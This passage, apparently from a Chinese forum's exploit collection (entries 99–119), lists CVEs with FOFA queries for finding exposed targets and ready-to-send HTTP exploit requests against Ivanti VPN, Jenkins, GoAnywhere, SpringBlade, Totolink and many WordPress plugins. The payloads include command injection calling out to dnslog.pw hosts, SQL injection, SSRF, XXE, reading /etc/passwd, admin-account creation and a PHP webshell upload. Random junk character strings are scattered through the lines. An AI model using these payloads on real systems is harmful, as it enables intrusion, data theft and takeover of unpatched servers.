4 v/ h# R- [" c3 }0 L$ S5 _id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
. R8 Y4 M) H- U4 a
2 \7 I# a D7 r: d* Q# |2 [4 Z. G" _/ U7 P4 ^2 D
99. Ncast盈可视高清智能录播系统busiFacade RCE; E: X$ {. y2 {, k$ ^. u9 ?) P) ^3 H+ o
CVE-2024-0305
# u0 g& r+ h( B7 S) d, L$ V5 uFOFA:app="Ncast-产品" && title=="高清智能录播系统"
+ K4 o) s( Y1 V7 [1 c: LPOST /classes/common/busiFacade.php HTTP/1.1! w9 i" i* X; w% L% l9 z _7 O
Host: 192.168.40.130:80802 x8 p1 `0 ~" w% [. [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.01 k/ n- Z/ _0 V$ C, {7 F( a9 A
Connection: close+ F u0 Y! Y- G ], H
Content-Length: 154
" J3 r, M2 U# R. d* y5 {% PAccept: */*
9 ]5 P J. ?* x% n: D, o5 hAccept-Encoding: gzip, deflate" t j1 l6 |8 [! p& v8 j4 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. a d8 j, [* ]' {/ a9 OContent-Type: application/x-www-form-urlencoded; charset=UTF-8
6 a4 j& |2 a2 h( M+ q$ F6 eX-Requested-With: XMLHttpRequest
1 H3 X3 i6 a' @: i9 l, M" ~5 v
' y( q* g/ \& K%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
# E% G' z8 K2 ?6 v. n1 p* }& `2 P8 U( d1 ?( a$ S1 U" l
8 g0 h' ~2 h& w0 y/ ^: [; t
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
/ F# N- k% v7 ?7 E6 B! cCVE-2024-0352
; U! g p% T5 a" ?4 y: HFOFA:icon_hash="874152924"$ P- n, \) m" M* r( H+ t' y, e8 k- e
POST /api/file/formimage HTTP/1.1* c( ?3 s) H, l
Host: 192.168.40.130& f/ i: @* q) B
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.367 y* N9 F5 c/ Q3 W- T
Connection: close
* {3 s+ C+ m" ]: k! o5 D/ xContent-Length: 2017 ]8 z. s5 u; r9 D1 ]. u* B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
9 X/ G( l+ j' W5 n/ KAccept-Encoding: gzip! o6 I* A+ t' \6 m* J$ k2 K: I
* y5 f6 r3 r/ ^( v0 t5 P
------WebKitFormBoundarygcflwtei
+ C5 E8 o, g6 Q! l# AContent-Disposition: form-data; name="file";filename="IE4MGP.php"
' @2 A/ [1 v. y9 d) A$ tContent-Type: application/x-php) @' @4 O& P+ ]1 l$ Q
" }' d$ d& Z5 @+ s2ayyhRXiAsKXL8olvF5s4qqyI2O
" x: S) |+ R& }' o, b------WebKitFormBoundarygcflwtei--
# z6 c2 {- s* M+ d* Q& [1 z) ?
7 y+ I2 q1 H2 }! s4 O( B5 @4 r* F) X$ z6 F* J+ f& m
101. ivanti policy secure-22.6命令注入
4 ?7 t1 N# W @' j g& z( K+ bCVE-2024-21887) Q$ I+ L- ]+ x
FOFA:body="welcome.cgi?p=logo"
$ y, g4 I+ r0 n; i/ m2 H9 DGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.12 V& q* `' N. p
Host: x.x.x.xx.x.x.x7 D$ t% x: \6 _+ x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& K, o* M& i6 z. U
Connection: close) B1 z7 Y x( c. j
Accept-Encoding: gzip3 |- Z: N1 {. N, q( z
. U% w' M+ ?) z; ^
; k$ i8 ~1 p% T4 _102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
! i" P# ~1 L& T) j3 F! i4 JCVE-2024-21893
" ?7 S2 P2 b. NFOFA:body="welcome.cgi?p=logo"
$ e% r0 F6 g1 TPOST /dana-ws/saml20.ws HTTP/1.11 d- M! I" w3 O: D! w4 Y
Host: x.x.x.x
, O; r& |$ I! r7 L) }: uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* ^% A. U n/ m$ q* {: [# jConnection: close
* R. P) x$ {. p- ^; N" gContent-Length: 792
9 J5 d' q% R; Y" Y! k& G" |Accept-Encoding: gzip& Z, d" e' g2 V% d, p! t$ M
, d0 P- s7 ~' l1 B3 b<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
3 T A S7 V% [4 X
" y& H# o! S& n: V- n103. Ivanti Pulse Connect Secure VPN XXE6 R/ z+ a9 D- ~! i. t0 C% l& N
CVE-2024-22024
, E+ a$ o" E( X! c. s( KFOFA:body="welcome.cgi?p=logo"8 C* Z7 ?( C0 y8 F$ L
POST /dana-na/auth/saml-sso.cgi HTTP/1.1 g/ ~ G7 w6 \+ S' \
Host: 192.168.40.130:1110 p- C4 e8 }, I# u7 K
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
4 L y& h# Z5 ^) a) m) _9 `Connection: close
# Q% E8 W& u' ^& I- kContent-Length: 204
" g& T( v# y* I( XContent-Type: application/x-www-form-urlencoded: }! E/ l7 ^ P
Accept-Encoding: gzip
( ?8 n4 |4 N$ b+ o3 [. k
6 q5 {) ^8 W; NSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==, f9 {: {8 w4 T% \
' J% [; J, Y8 h3 q5 L
$ u5 O9 ?1 y0 U6 D: i% Q# e
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
9 ]& H: [+ Q6 |* Y4 j6 [+ K<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
t0 e; U" S! w* s+ R* Y9 T2 u1 t2 \5 l/ J0 b ]
: ` S# v9 k7 Q0 \104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
; n7 }: R' ^& TCVE-2024-0569
$ `) `1 W- ]4 `% {, mFOFA:title="TOTOLINK"* _9 L/ N4 A/ v8 Y# v
POST /cgi-bin/cstecgi.cgi HTTP/1.1: G/ `& }9 ]7 |3 P5 y
Host:192.168.0.1: U, C" R, V( g* }5 o" y" u
Content-Length:41" D' f9 [( D5 ^) F5 D4 L: F% B7 p) r
Accept:application/json,text/javascript,*/*;q=0.01 n% K- O1 m+ r- Q
X-Requested-with: XMLHttpRequest7 f. Z2 x3 G9 }& e) V$ N$ j! i
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.364 q# W, Q; V& q: z2 H" y9 G, X6 ^
Content-Type: application/x-www-form-urlencoded:charset=UTF-8% p5 |3 Q: K' y @( ~" @" E3 Z
Origin: http://192.168.0.1
$ ^9 J+ c4 [ k2 u$ c5 d; NReferer: http://192.168.0.1/advance/index.html?time=16711523805643 a1 O* |1 U+ K7 \( [
Accept-Encoding:gzip,deflate
& j& R5 s7 p6 J. E9 ^) RAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
P+ q4 R' j; c GConnection:close/ s% x! y7 u, f
: B# \& {$ C3 {8 h. g5 r; s4 `* R
{
( d; S* _; j5 v* J1 w"topicurl":"getSysStatusCfg",1 s0 B( g/ G8 F: ?( _8 h
"token":""
% p: g5 y# X$ O( W% D; ~2 ?}! M- j$ Z, L- c9 r* I, n" l
0 b8 X+ V4 k' p
105. SpringBlade v3.2.0 export-user SQL 注入
. A' x. ~( W$ W' _1 y# e7 jFOFA:body="https://bladex.vip"! e4 |3 H9 ^0 M
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
% Y! Z% m9 x! x8 q2 c. t: E# V [; o* u
106. SpringBlade dict-biz/list SQL 注入% p& e& Q% F* I9 g
FOFA:body="Saber 将不能正常工作"5 y. U( H* l# v! T
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
1 U! ?9 Y, E' G6 k! N" }) p7 V/ r) }Host: your-ip9 N0 a( [5 j- P9 J5 Y. _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 |! Z: w4 @) Z( e+ s! m0 q
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A7 i/ ]5 O* P+ H. E& x
Accept-Encoding: gzip, deflate
6 C q3 g9 G) [* z: qAccept-Language: zh-CN,zh;q=0.9 y7 Z0 v$ k$ c0 \# v
Connection: close6 m, H' Z- y, g( a
/ y; G9 J' s, @, ~% y& m: e, z
( [0 M K9 x. v7 Z3 k" d107. SpringBlade tenant/list SQL 注入0 U( y9 l- M0 q, H: H6 l4 F
FOFA:body="https://bladex.vip". b0 ~/ g% j& ^( `- {$ z
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
* {# P" D5 Y( t, _$ |6 `Host: your-ip* N6 D( C$ G. S+ a( R+ V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; X. d! i4 b5 P) U3 f" x
Blade-Auth:替换为自己的
" Q1 F7 C5 k7 ]8 WConnection: close
$ i! B0 Q( Y4 R, ? q) @ |3 p" N' }+ d8 x! Q6 }# U% r/ x
2 P( L% R9 {3 }+ }
108. D-Tale 3.9.0 SSRF8 K$ G+ x: P! n; j
CVE-2024-21642% j& |6 ^5 k0 O+ @5 Z' {
FOFA:"dtale/static/images/favicon.png"
/ Z1 z. \: I; P1 P3 yGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
& q/ k5 z, a8 l5 J. h8 ]Host: your-ip
8 M/ P7 o6 {' D# x& M# HAccept: application/json, text/plain, */*
2 d, Y2 R; U' R' ]+ f! Q, YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: I b- n5 @, R; \Accept-Encoding: gzip, deflate
( }5 @7 x7 J6 @# r" }3 |) uAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
; a) p$ m& h! SConnection: close* V! {0 o3 T! r! ~, c$ @
$ W# `! k% i8 P) V d
5 i; _% W4 D& n( A c109. Jenkins CLI 任意文件读取
# L; R$ ]" r2 b6 Z; YCVE-2024-238973 ]% X( K: E' m1 R( Z
FOFA:header="X-Jenkins"2 m/ q' J- ?8 \$ V
POST /cli?remoting=false HTTP/1.1. p/ o y1 q9 d& x4 ~6 `2 b; a7 M) P O
Host:( O4 }6 q6 g: V# q
Content-type: application/octet-stream
- j3 H: @6 s! U1 c8 X) ?3 r! G( NSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92# x# S/ Z5 T& I( p: ]* B
Side: upload
+ C; u/ S& H7 v+ Y8 UConnection: keep-alive
; w# A4 `% M5 C F! [6 [7 j8 xContent-Length: 163
! s9 }9 C& y5 G% ~
7 e! T' m0 e' v y. Ub'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
6 k+ D: x+ w3 D7 w( V& g0 j8 s+ F. v
( u$ F/ N8 O) Q( y6 WPOST /cli?remoting=false HTTP/1.1
2 X" Z( g; t8 f: s6 e* B& KHost:
3 z) d5 X- w' l2 L# b* G1 KSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92 m% _0 g; u, U0 c* h% v& I2 e8 d
download
- B: Z k. U$ |. e9 EContent-Type: application/x-www-form-urlencoded
( X" H, E5 g" M. h% }' P+ aContent-Length: 0
; a3 |$ i1 Q4 o2 K( U( ~8 T% Q/ R' I# Y, a
2 x+ \' A! ^! T& M$ hERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin3 p8 ^% B2 T0 t9 t* |" {& z
java -jar jenkins-cli.jar help! g# ] r5 e& c" A+ V
[COMMAND] I$ @4 b7 b" w4 k5 \% |
Lists all the available commands or a detailed description of single command.3 m* \: u, A2 M
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)! V& o- \& c4 R1 F( S; v
) f. P; H6 \3 \
# f9 ?1 ?( _3 e) [110. Goanywhere MFT 未授权创建管理员
2 C9 ?5 n: K7 g0 lCVE-2024-0204
; w5 K, h6 S$ y; F" l' w& qFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
O4 _, R9 o. ?' {0 L: LGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1$ o& }( `4 J9 F$ Z" }
Host: 192.168.40.130:8000 j3 [( J J7 M, e
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36: [3 O4 p& E. y
Connection: close: z, }4 V* J& \% V. }" d; i
Accept: */*6 ?5 ]7 f# ^; Y2 M" m: F1 n4 v6 A
Accept-Language: en
3 z/ `. [4 @( R% I* [4 r6 TAccept-Encoding: gzip6 r3 _* }, Q2 H1 @
+ S* I% |( L# u
2 Y& t+ Q/ |( A ^1 a1 Z! _$ ~111. WordPress Plugin HTML5 Video Player SQL注入/ U) B. _/ m0 _9 p0 ~; O$ h
CVE-2024-1061' O( X8 j, D. S" A* |$ d
FOFA:"wordpress" && body="html5-video-player"# J7 F! s1 q' q, c( Y
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
9 y1 A3 l4 U8 I# u$ YHost: 192.168.40.130:1124 \* ~' f: i+ M1 N% }( A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: q! U( v4 i0 z: V. {# BConnection: close# I, P7 F/ F# r- T/ J) R1 `6 Z$ O
Accept: */*6 B8 B9 I# m8 B9 G
Accept-Language: en/ q. L& ~ a+ [. r
Accept-Encoding: gzip# ?# V O/ s' }% |4 N/ D" H
5 ]! s6 N$ E& p" L' p: S/ Z8 u: L9 w5 P% L' C4 m
112. WordPress Plugin NotificationX SQL 注入6 y/ I8 Y: F; x3 H
CVE-2024-1698 ]( N; \; W' G# M: e! u1 \; e, }
FOFA:body="/wp-content/plugins/notificationx"
5 ]1 i- B8 w% E, h O9 A5 ePOST /wp-json/notificationx/v1/analytics HTTP/1.1$ t+ }& L0 S* a' ]- g9 @( v1 i
Host: {{Hostname}}
9 p* s8 w* c/ T2 [) e% b7 R! k( GContent-Type: application/json
4 I" `8 _3 R# x1 V4 c6 i4 V* t* P
3 Y5 [9 N* Z' Q) p: i{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}: o/ b5 D, P( }( p8 a0 G1 H4 @0 d
) O* z, \; ?1 `8 ]8 A/ ]; w, L. [% P' I$ ?: R' W
113. WordPress Automatic 插件任意文件下载和SSRF
% R& q9 N5 J3 `, _9 jCVE-2024-27954
: E4 ~ J+ `0 i+ uFOFA:"/wp-content/plugins/wp-automatic"' k: C! O5 ?+ B8 C3 C. S5 j- T
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1* \& s# G$ b1 ]* c2 _4 T
Host: x.x.x.x! q( G8 |! U3 o2 Z
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 q* a3 n/ ^3 g W! R( D3 lConnection: close# T) | g, R# d3 d8 P
Accept: */*
& {* `0 z( J$ `* Q2 p+ h: C' r* x- YAccept-Language: en
7 q( X L# u3 L0 KAccept-Encoding: gzip
: z, y6 l0 P% E7 Y- C6 ^9 k
+ Y6 n5 Y$ H" }5 _% y
+ ^7 _9 \$ q" @* G4 G114. WordPress MasterStudy LMS插件 SQL注入" n. `" [+ \3 M1 a( v) j5 X" ]
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
: k) B' }1 S7 u2 b+ z, F: ?. s8 F3 J- ^/ ZGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.18 _- M4 }' e6 }) D
Host: your-ip! F- X! V' M1 t8 W
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.360 X# ~4 T3 w1 [6 f
Accept-Charset: utf-8
8 [8 k5 @% ^3 d0 S" r5 M, oAccept-Encoding: gzip, deflate
: T( E* G. q) M2 f: ^Connection: close
4 g$ i3 |3 \6 r ?3 O9 U B( h& i1 z: z1 B) h) w% k
- r' F( l. L4 D8 b, T, G1 d% b( |
115. WordPress Bricks Builder <= 1.9.6 RCE- Y7 }& [6 G" p! _
CVE-2024-256006 P/ T5 q7 D( Z! b/ j
FOFA: body="/wp-content/themes/bricks/"
/ }1 H. L; V7 X; ~: z7 D第一步,获取网站的nonce值6 P: ]5 Z; y7 k, i
GET / HTTP/1.1
3 r5 f, v2 d7 c+ X. W5 s0 aHost: x.x.x.x e+ }4 G2 Q7 U' c; x3 _
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36+ y; `# B5 X7 S6 M# b. J. C
Connection: close
- E' I! ^& ]) t9 @2 R# JAccept-Encoding: gzip# ^0 T' v0 V6 j$ [
' w# F5 b4 c! i7 O' m
5 n2 i- U: x3 {! f8 X ^7 L- T. N
第二步替换nonce值,执行命令
5 W6 @1 ^+ u) n$ {POST /wp-json/bricks/v1/render_element HTTP/1.1
$ V0 T+ S6 _( c5 B; N4 G0 T% c4 R1 uHost: x.x.x.x5 \- F6 u0 N2 s, q& B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
6 i+ ^( f$ g x LConnection: close
. f) _/ l3 z& {" Q1 I, \4 k: Z& F0 f& OContent-Length: 356
/ Q( e0 ?: H% F yContent-Type: application/json6 {' \ D8 E7 u3 o9 S& P [: ^5 R
Accept-Encoding: gzip
( X3 S( d7 C9 p' F1 G, e9 v+ S- z3 k, C
{
' J7 k+ N' u6 S1 P"postId": "1",# E, x9 D# i m) u4 }* I
"nonce": "第一步获得的值",
' i% z5 I" m6 p: c) X5 e1 _: l, D "element": {
, c* d4 V3 G7 I: ?6 l "name": "container",9 b( J2 O/ |& x" C) K2 f2 {; p
"settings": {
/ Y* q. a! q% P( S$ b "hasLoop": "true",
6 W& A6 i$ `4 `+ {* H0 u# C "query": {
0 s! {, w! z$ u8 W( X) Z+ q8 { "useQueryEditor": true,
% d( |8 c" q: H$ t! f+ s; d: S "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
! ]& T! S5 G6 y4 y* V2 J9 t! o "objectType": "post"
' y' h5 E+ I9 A3 B }
' s5 v9 y3 Y# S1 X7 U y }* f b, l3 c6 R% S8 E1 [' k
}
7 }. R+ s j% S}4 F* I6 @) D5 R" f" `
4 l. I% f- J1 v7 X) Z! b; Z5 Z9 Z7 Q2 k9 O% m9 C! z# P/ K
116. wordpress js-support-ticket文件上传
& U- v' |# B/ `' U% x; tFOFA:body="wp-content/plugins/js-support-ticket"
! O5 g4 |/ F9 i6 E* l- y# @5 VPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
# ^6 G. G) e; V; }: r0 ^ d2 c Y1 ?) KHost:
2 l, P' Q/ {" E6 ^( i1 CContent-Type: multipart/form-data; boundary=--------767099171
! u: z% Q! ^9 X6 zUser-Agent: Mozilla/5.0
( [6 h% M9 _ |4 a+ P# a9 g8 y3 m5 H6 C1 i
----------767099171; |& I# [: E" w0 q5 a2 s
Content-Disposition: form-data; name="action"
7 ]# r1 L+ j- ?3 econfiguration_saveconfiguration
6 X! L+ D% D& @8 \----------767099171
% G4 w7 Z) P$ Q! j/ e1 F4 NContent-Disposition: form-data; name="form_request". N" f2 [1 J$ n
jssupportticket3 `0 e% d, ?) U) r! t1 V
----------767099171+ b$ I1 [; `! W
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php") v, {4 a2 `+ n9 G u; u( Q5 {
Content-Type: image/png1 z/ a q: E: D& K: _' S) F
----------767099171--
6 ~# V8 O8 o4 ?& A
. e) y* O3 n8 X% W: r) ^- E0 N
117. WordPress LayerSlider插件SQL注入
9 q( Q" q' \" h, }& e- Z3 |version:7.9.11 – 7.10.0
, y. w3 t2 _ M& tFOFA:body="/wp-content/plugins/LayerSlider/"( X a" b$ O, S' m
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1) E* l* i- {9 m9 [$ V
Host: your-ip
K ~/ I7 y# TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* Y, G7 R6 z7 U; ~0 o! ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( S8 }/ q1 ^0 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* c# P1 [0 ?6 o! a: y, k. C+ H4 jAccept-Encoding: gzip, deflate, br
0 @7 m3 }9 m+ y# h* gConnection: close) v& b. t1 l w9 M0 K' J
Upgrade-Insecure-Requests: 1
* t; S( Z. z' U0 y- N5 F6 i( s7 U C
3 e* ^4 b! A; [' h* O# r5 r5 V
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传' Q; a$ Q8 _& N4 S0 f' l1 U5 ^5 S: _" Y7 e
CVE-2024-0939 J" x: ~, ~! u' q
FOFA:title="Smart管理平台"* N3 d1 d0 h( u# B4 f
POST /Tool/uploadfile.php? HTTP/1.17 n, p2 L$ P9 E+ `7 |" D) S c
Host: 192.168.40.130:8443! ?; k; x) F4 o( `- W1 {9 l3 s
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
( ]+ c( b! E" {2 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
7 U9 I, W. V' e" r8 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 G$ z0 |6 N; C' @$ ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ^$ w# ^; E8 m7 mAccept-Encoding: gzip, deflate& B @. ?2 J$ F0 }
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887( `$ w; P- v1 L0 ?7 Z f; P4 k- N _
Content-Length: 405+ e9 a9 ?; V& [! d. [
Origin: https://192.168.40.130:84438 M8 O8 o7 e# a0 g8 {
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
0 G( e/ h" z/ Q; H6 {Upgrade-Insecure-Requests: 1
3 y$ \, @, ]; Z$ u4 w/ s$ rSec-Fetch-Dest: document3 v3 T. c- V5 q) G" g9 J
Sec-Fetch-Mode: navigate: O0 k! @) C% D# T- V% C9 Z
Sec-Fetch-Site: same-origin
* h9 P9 D: l, u/ r( gSec-Fetch-User: ?1" d& f7 h9 m* k) V$ I
Te: trailers; e* e4 `2 N, U' @5 F4 [9 X: ]
Connection: close1 b, a2 m$ {* ^$ m
; Q' H# A8 m9 d0 m- b% l$ e-----------------------------13979701222747646634037182887
( }" ?" b- t% d- r* e" y/ ], @Content-Disposition: form-data; name="file_upload"; filename="contents.php"
$ \/ h9 x- t, n+ tContent-Type: application/octet-stream0 N' t! C/ N. y( p4 ` q; p
+ [5 V3 V; b; e5 U. T2 ]
<?php
% p* L. p% X. D. wsystem($_POST["passwd"]);
8 M! z1 o( [/ v?>
# }' E) y5 k4 H: l/ }! y7 J/ Z( D/ L-----------------------------13979701222747646634037182887
3 g/ c4 ~' U# d) VContent-Disposition: form-data; name="txt_path"- [4 a" ^, b; h+ ]; j0 Y# Q6 P
. q- h, L6 d# E, E; j6 |( D$ N8 w
/home/src.php
1 U/ \. H M+ G+ Q0 y$ U$ {-----------------------------13979701222747646634037182887--
; y L; S8 c6 }+ Y3 {) |! T, P. S; E$ R! E8 ^4 ~0 U) w
/ r9 \* [" U3 X6 i7 k2 g( b# N
访问/home/src.php
, }) T; o9 G, r. _1 j6 }$ W4 C) S
119. 北京百绰智能S20后台sysmanageajax.php sql注入
0 ~ W! n# ~8 h2 _) YCVE-2024-1254
! _+ _% q. C, r6 J3 gFOFA:title="Smart管理平台"
) w9 {5 q9 v7 O, [. m9 A先登录进入系统,默认账号密码为admin/admin# Q+ x9 I" |" I) Y+ y
POST /sysmanage/sysmanageajax.php HTTP/1.11/ D A8 j- m) l9 L/ R3 B/ z# I
Host: x.x.x.x& Z# Q2 B, O% w2 _/ {1 }
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee4 D1 S) l6 m1 b+ E/ A; Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' E* K3 b3 R4 Y2 J; v
Accept: */*8 w z+ W/ m9 N. s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ m' O2 C; P. f3 y! P5 `
Accept-Encoding: gzip, deflate
7 m N5 M. R4 Q& q% e7 pContent-Type: application/x-www-form-urlencoded;
) _0 d2 M8 b/ T9 s4 L3 m; i5 m$ O' LContent-Length: 109! V P# c6 P1 R# E$ ^+ P7 ^% y" R4 o% \% ~8 C
Origin: https://58.18.133.60:8443% T4 j* b) Z9 j- r4 B; v
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
# E( M2 m- c+ z$ |Sec-Fetch-Dest: empty
0 f# M. I- E! h9 r ZSec-Fetch-Mode: cors( c d t5 F& O
Sec-Fetch-Site: same-origin
p8 w- g. s2 Q& WX-Forwarded-For: 1.1.1.10 G" p/ Q0 S# _( o; x
X-Originating-Ip: 1.1.1.1
3 s' c( S- h( ]& F; ]X-Remote-Ip: 1.1.1.13 W/ }/ r8 X+ V1 O+ p7 ?
X-Remote-Addr: 1.1.1.1
+ Z, f1 c8 z3 k( K: S6 cTe: trailers) E6 b- g( ^ |) C0 j
Connection: close
$ n7 N0 H% z- G8 N4 U7 V. ]: f6 h# N4 Z. x
